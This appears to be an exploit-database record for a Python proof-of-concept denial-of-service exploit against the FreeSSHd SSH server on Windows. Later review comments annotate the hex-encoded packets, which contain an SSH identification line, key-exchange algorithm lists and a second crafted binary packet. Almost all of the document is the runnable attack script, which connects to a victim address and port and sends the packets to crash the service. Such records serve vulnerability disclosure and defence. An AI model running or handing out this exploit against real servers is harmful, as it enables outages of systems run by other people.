FreeSSHd Remote Denial of Service

2011-12-24T00:00:00
ID 1337DAY-ID-17299
Type zdt
Reporter Level
Modified 2011-12-24T00:00:00

Description

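Proof-of-concept denial-of-service exploit for the Windows platform (category: dos / poc). This record does not name an affected FreeSSHd version or a CVE identifier.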

                                        
                                            import sys, socket, binascii
# Start-up banner: tool title and author credit, framed by blank lines.
print("\n".join((
    "\n",
    "----------------------------------------------------------------",
    "|      FreeSSHd, Remote Denial of Service                       |",
    "|      Level, Smash the Stack                                   |",
    "----------------------------------------------------------------",
    "\n",
)))
# Two hex-encoded byte strings. main() decodes each with binascii.unhexlify()
# and sends them, in list order, over a single TCP connection.
#
# NOTE(review): the hex was not re-validated here (total length, even digit
# count); treat it as published text rather than a verified capture.
buf = [
 # Element 0: starts with the ASCII identification line
 # "SSH-2.0-PuTTY_KiTTY\r\n", followed by binary data in which comma-separated
 # algorithm names are readable once decoded (e.g.
 # "diffie-hellman-group-exchange-sha256", "aes256-ctr", "hmac-sha1",
 # "none,zlib").
 # NOTE(review): looks like a client key-exchange negotiation message; the
 # listing does not say which field causes the fault -- confirm before
 # deriving a signature from it.
 # NOTE(review): the identification line is presumably what the ordinary
 # client of that name sends too, so it is a weak indicator on its own.
 ("5353482d322e302d50755454595f4b695454590d0a0000027c065a3db5f2230f6aed834d36a6fa8"
 "55b1f140000009a6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d73686"
 "13235362c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6"
 "469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d6"
 "16e2d67726f7570312d736861312c727361323034382d7368613235362c727361313032342d73686"
 "1310000000f7373682d7273612c7373682d6473730000009f6165733235362d6374722c616573323"
 "5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657331393"
 "22d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d6362632c626"
 "c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c336465732d636"
 "2632c617263666f75723235362c617263666f75723132380000009f6165733235362d6374722c616"
 "5733235362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657"
 "33139322d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d63626"
 "32c626c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c3364657"
 "32d6362632c617263666f75723235362c617263666f75723132380000001f686d61632d736861312"
 "c686d61632d736861312d39362c686d61632d6d64350000001f686d61632d736861312c686d61632"
 "d736861312d39362c686d61632d6d6435000000096e6f6e652c7a6c6962000000096e6f6e652c7a6"
 "c696200000000000000000000000000aac55b402546"),
 # Element 1: binary only; its first bytes are 00 00 01 0c 06 1e.
 # NOTE(review): presumably a length field, a padding-length byte and a
 # message-type byte as in the SSH binary packet layout -- not verified here.
 ("0000010c061e000001005e04d639ec531b5b8623f7ea733be6cc59d6439a40bbca110e1c2d45902"
 "46cc2ef5deb76623f30c6181112c168ba4f1d253a6aebe45b6a5c496b59894233f4991c8969b68d4"
 "3261e03d768dccda76f935f185b3168626d07a3c496cfb760e3fba82fd10dd309fec54a67bbbb294"
 "5f316080d27768743c975d90728fc87b5b33774ed6e2ebf6106001d4f3342a8a83fd501b6b7cc7ac"
 "e537f3bb83f2f0ff21af624f9353ab3e1ee2c5eebd9b5c36579656ad5a5fec779c88665abf1ced55"
 "b8aa6272860e58c6c4482c1b83020e270487cf96b5cffffffff60534d770a69bcc1c71963827ba6e"
 "3fb8a0c06f3bf64c3d426e67d00d90c679ee26388d2ef69f7357f9b2a688b4527")
 ]
def usage():
    """Print the expected command-line form followed by one example call."""
    print("\n".join((
        "usage  : ./freesshd.py <victim_ip>  <victim_port>",
        "example: ./freesshd.py 192.168.1.22 22",
    )))
def main():
    """Send the two blobs in ``buf`` to the address and port given as arguments.

    Expects exactly two command-line arguments (address, port); with any
    other count it prints the usage text and exits.  It opens one TCP
    connection, reads and prints up to 1024 bytes of whatever the server
    sends first, transmits each ``buf`` entry after hex-decoding it, and
    closes the socket.  Nothing is read back after the payload, so the
    script itself gives no indication of whether the service was affected.

    Seen from the server side, the whole exchange is one short-lived
    connection: a client identification line, two binary packets, then a
    close.  No authentication step is attempted.
    """
    if len(sys.argv) != 3:
        usage()
        sys.exit()

    target_host = sys.argv[1]
    target_port = int(sys.argv[2])

    conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    conn.connect((target_host, target_port))

    # First bytes sent by the server (its greeting), echoed to the console.
    greeting = conn.recv(1024)
    print(greeting)

    print("[*] Sending Payload...\n")
    for hex_blob in buf:
        # send() may transmit fewer bytes than given; its result is not checked.
        conn.send(binascii.unhexlify(hex_blob))

    print("[*] Closing Socket...\n")
    conn.close()
# Run main() only when the file is executed as a script, not when imported.
if __name__ == "__main__": 
    main()


